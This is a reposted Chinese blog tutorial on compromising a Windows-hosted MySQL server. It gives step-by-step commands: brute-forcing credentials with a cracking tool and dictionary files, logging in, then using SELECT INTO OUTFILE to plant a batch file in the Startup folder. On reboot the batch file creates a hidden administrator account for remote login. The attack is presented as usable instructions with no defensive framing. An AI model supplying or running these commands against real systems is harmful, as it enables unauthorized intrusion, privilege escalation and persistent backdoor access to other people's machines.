博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
攻击基于Windows平台的MySQL系统一例
阅读量:4118 次
发布时间:2019-05-25

本文共 852 字,大约阅读时间需要 2 分钟。

1.用mysql_pwd_crack.exe工具扫描对方mysql的用户名和密码
mysql_pwd_crack.exe 192.168.1.14 -x 3306 -a
字典文件分别命名为:user.dic  pass.dic
2.登陆对方的mysql(假设已经扫出用户名为为abc、密码为abc)
mysql -h 192.168.1.14 -u abc -p

3.创建数据库

create database aaa;
4.进入数据库

use aaa;
5.在数据库aaa中创建表bbb,字段名为ccc

 
create table bbb(ccc text);
6.在表中插入批处理文件代码
insert into bbb values(“@echo off”);  insert into bbb values(“net user li 123456 /add”);  insert into bbb values(“net user li /active:yes”);  insert into bbb values(“net localgroup Administrators li /add”);
7.将批处理文件中的代码查询出来,并以批处理文件hacker.bat的格式保存在C:\\Documents and Settings\\Administrator\\「开始」菜单  \\程序\\启动\\目录下
SELECT * INTO OUTFILE 'C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动\\hacker.bat' FIELDS TERMINATED BY ' ' ENCLOSED BY ' ' ESCAPED BY ' ' LINES TERMINATED BY '\n' FROM bbb;
测试结果:当对方重启计算机时,会发现他的计算机系统中会自动生成一个有管理员权限的用户li,并且用它可以远程登陆他的计算机。

转载地址:http://erjpi.baihongyu.com/

你可能感兴趣的文章
手绘VS码绘(一):静态图绘制(码绘使用P5.js)
查看>>
手绘VS码绘(二):动态图绘制(码绘使用Processing)
查看>>
基于P5.js的“绘画系统”
查看>>
《达芬奇的人生密码》观后感
查看>>
论文翻译:《一个包容性设计的具体例子:聋人导向可访问性》
查看>>
基于“分形”编写的交互应用
查看>>
《融入动画技术的交互应用》主题博文推荐
查看>>
链睿和家乐福合作推出下一代零售业隐私保护技术
查看>>
Unifrax宣布新建SiFAB™生产线
查看>>
艾默生纪念谷轮™在空调和制冷领域的百年创新成就
查看>>
NEXO代币持有者获得20,428,359.89美元股息
查看>>
Piper Sandler为EverArc收购Perimeter Solutions提供咨询服务
查看>>
RMRK筹集600万美元,用于在Polkadot上建立先进的NFT系统标准
查看>>
JavaSE_day12 集合
查看>>
JavaSE_day14 集合中的Map集合_键值映射关系
查看>>
Day_15JavaSE 异常
查看>>
异常 Java学习Day_15
查看>>
JavaSE_day_03 方法
查看>>
day-03JavaSE_循环
查看>>
Mysql初始化的命令
查看>>